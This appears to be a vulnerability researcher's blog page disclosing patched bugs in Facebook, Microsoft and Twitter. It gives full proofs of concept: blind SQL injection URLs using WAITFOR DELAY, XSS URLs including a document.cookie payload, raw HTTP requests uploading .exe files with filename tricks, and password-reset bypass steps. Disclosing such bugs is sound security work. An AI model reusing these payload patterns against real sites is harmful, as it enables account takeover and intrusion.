facebook Password Reset Vulnerability Found in

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Sunday, 6 January 2013

Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com

Posted on 23:01 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, which can be exploited by an attacker to bypass certain security restrictions.

In normal circumstances, an authenticated Facebook user is required to enter his/her current password on the change password page to prevent an unauthorized person from changing the password without the user's knowledge.

However, an attacker can change/reset a user's password without knowing the user's current password by accessing this URL directly: https://www.facebook.com/hacked.
After that, the page will be redirected to https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked
Now, the attacker can click "Continue" to change/reset the user's password.

Proof of concept
Step 1: Logon to Facebook and access this URL directly: https://www.facebook.com/hacked. The page will be redirected to https://www.facebook.com/checkpoint/checkpointme?f=[userid]&r=web_hacked


Step 2: Click on "Continue" to proceed


Step 3: Enter "New Password" and "Confirm Password" to change/reset the password.


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat
https://www.facebook.com/whitehat
Read More
Posted in Facebook, Password Reset | No comments

Wednesday, 11 July 2012

Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com

Posted on 19:44 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsoft.com, which can be exploited by an attacker to conduct Blind SQL injection attacks.

Proof of concept URLs which will cause a time delay of 25 seconds are provided below:
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en


Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat
http://technet.microsoft.com/en-us/security/cc308575
Read More
Posted in Microsoft, SQL Injection | No comments

Thursday, 10 May 2012

Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Posted on 21:22 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068
Accept-Encoding: gzip, deflate
Host: attachments.facebook.com
Content-Length: 194182
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [information removed]

-----------------------------7db2e171a0068
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="attachment"; filename="..exe"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat
https://www.facebook.com/whitehat
Read More
Posted in Arbitrary File Upload, Facebook | No comments

Thursday, 3 May 2012

Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Posted on 02:17 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

-----------------------------265001916915724
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat
https://www.facebook.com/whitehat
Read More
Posted in Arbitrary File Upload, Facebook | No comments

Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com

Posted on 02:04 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
Tested in IE9 with XSS filter enabled
============================
http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E



Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat
http://technet.microsoft.com/en-us/security/cc308575
Read More
Posted in Microsoft, XSS | No comments

Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Posted on 01:50 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188

-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat
https://www.facebook.com/whitehat
Read More
Posted in Arbitrary File Upload, Facebook | 17 comments

Sunday, 29 April 2012

Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com

Posted on 02:38 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in twitter.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);&region=follow_link&screen_name=twitterapi&source=followbutton&variant=2.0


Conclusion
This vulnerability has been confirmed and patched by Twitter Security Team. I would like to thank them for their quick response to my report.

Twitter White Hat
https://twitter.com/about/security
Read More
Posted in Twitter, XSS | No comments
Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability
    Description Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publis...
  • Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.f...
  • Sybase EAServer 6.3.1 Directory Traversal Vulnerability
    Description Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run ...
  • FileCOPA FTP Server 5.02 Directory Traversal Vulnerability
    Description FileCOPA is a commercial FTP server for Windows that is available as shareware. Sow Ching Shiong, an independent vulnerability r...
  • Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsof...
  • Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, whi...
  • Trend Micro Control Manager 5.5 Directory Traversal Vulnerability
    Description Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administr...
  • F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability
    Description F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus out...
  • Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.m...
  • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities
    Description Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of f...

Categories

  • Adobe
  • Apache
  • Apple
  • Arbitrary File Upload
  • CSRF
  • Directory Traversal
  • F-Secure
  • Facebook
  • HP
  • Microsoft
  • Oracle
  • Password Reset
  • SQL Injection
  • Sybase
  • Symantec
  • Trend Micro
  • Twitter
  • XSS

Blog Archive

  • ▼  2013 (1)
    • ▼  January (1)
      • Facebook Bug #4: Password Reset Vulnerability Foun...
  • ►  2012 (25)
    • ►  July (1)
    • ►  May (4)
    • ►  April (20)
Powered by Blogger.

About Me

freda
View my complete profile